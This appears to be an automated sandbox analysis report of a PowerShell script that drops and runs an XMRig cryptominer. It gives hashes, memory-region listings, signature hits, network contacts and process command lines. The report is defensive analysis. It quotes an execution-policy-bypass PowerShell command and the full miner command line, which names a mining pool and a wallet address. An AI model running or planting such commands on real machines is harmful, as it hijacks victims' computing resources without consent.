C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4440-47-0x000001D215140000-0x000001D215160000-memory.dmp

memory/4440-48-0x000001D215180000-0x000001D2151A0000-memory.dmp

memory/4440-49-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/392-50-0x00007FFF77AD3000-0x00007FFF77AD5000-memory.dmp

memory/392-51-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/4440-52-0x000001D2151A0000-0x000001D2151C0000-memory.dmp

memory/4440-53-0x000001D2151C0000-0x000001D2151E0000-memory.dmp

memory/4440-54-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/392-55-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/4440-56-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-58-0x000001D2151A0000-0x000001D2151C0000-memory.dmp

memory/4440-57-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-59-0x000001D2151C0000-0x000001D2151E0000-memory.dmp

memory/4440-60-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-61-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-62-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-63-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-64-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-65-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-66-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-67-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-68-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-69-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-70-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-71-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-72-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-73-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-74-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-75-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-76-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-77-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-78-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-79-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-80-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-81-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-82-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-83-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-84-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-85-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-86-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-87-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-88-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-89-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-90-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-91-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-92-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-93-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-94-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-95-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-96-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-97-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-98-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-99-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-100-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-101-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-102-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-103-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-104-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-105-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-106-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-107-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-108-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-109-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-110-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-111-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-112-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-113-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-114-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-115-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-116-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-117-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-118-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:45

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 f.f.f.f.8.f.2.0.2.c.1.c.3.1.0.9.f.f.f.f.6.9.8.8.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 152.141.79.40.in-addr.arpa udp

Files

memory/3328-3-0x00007FFC73053000-0x00007FFC73054000-memory.dmp

memory/3328-5-0x00000185F5520000-0x00000185F5542000-memory.dmp

memory/3328-6-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-9-0x00000185F56D0000-0x00000185F5746000-memory.dmp

memory/3328-10-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_guee0e30.l0o.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3328-25-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-48-0x00000185F56B0000-0x00000185F56C2000-memory.dmp

memory/3328-61-0x00000185F5670000-0x00000185F567A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/512-90-0x0000020FE4B90000-0x0000020FE4BB0000-memory.dmp

memory/512-91-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/3328-92-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-94-0x00007FFC73053000-0x00007FFC73054000-memory.dmp

memory/512-93-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/3328-95-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-96-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/512-97-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-98-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-99-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-100-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-101-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-102-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-103-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-104-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-105-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-106-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-107-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-108-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-109-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-110-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-111-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-112-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-113-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-114-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-115-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-116-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-117-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-118-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-119-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-120-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-121-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-122-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-123-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-124-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-125-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-126-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-127-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-128-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-129-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-130-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-131-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-132-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-133-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-134-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-135-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-136-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-137-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-138-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-139-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-140-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-141-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-142-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-143-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-144-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-145-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-146-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-147-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-148-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-149-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-150-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-151-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-152-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-153-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-154-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-155-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-156-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-157-0x00007FF620930000-0x00007FF621563000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:48

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1766s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3920-0-0x00007FF829673000-0x00007FF829675000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgfjg3fv.zo1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3920-9-0x0000023547990000-0x00000235479B2000-memory.dmp

memory/3920-10-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-11-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-12-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-14-0x0000023547A30000-0x0000023547A42000-memory.dmp

memory/3920-15-0x0000023547A20000-0x0000023547A2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3904-46-0x0000024A453E0000-0x0000024A45400000-memory.dmp

memory/3904-47-0x0000024A45430000-0x0000024A45450000-memory.dmp

memory/3904-48-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3920-49-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-50-0x00007FF829673000-0x00007FF829675000-memory.dmp

memory/3904-51-0x0000024A45450000-0x0000024A45470000-memory.dmp

memory/3904-52-0x0000024A45470000-0x0000024A45490000-memory.dmp

memory/3904-53-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-54-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-56-0x0000024A45450000-0x0000024A45470000-memory.dmp

memory/3904-55-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-57-0x0000024A45470000-0x0000024A45490000-memory.dmp

memory/3904-58-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-59-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-60-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-61-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-62-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-63-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-64-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-65-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-66-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-67-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-68-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-69-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-70-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-71-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-72-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-73-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-74-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-75-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-76-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-77-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-78-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-79-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-80-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-81-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-82-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-83-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-84-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-85-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-86-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-87-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-88-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-89-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-90-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-91-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-92-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-93-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-94-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-95-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-96-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-97-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-98-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-99-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-100-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-101-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-102-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-103-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-104-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-105-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-106-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-107-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-108-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-109-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-110-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-111-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-112-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-113-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-114-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-115-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-116-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:48

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows, every column N/A: the payload signature matched but no description, indicator, process or target was recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

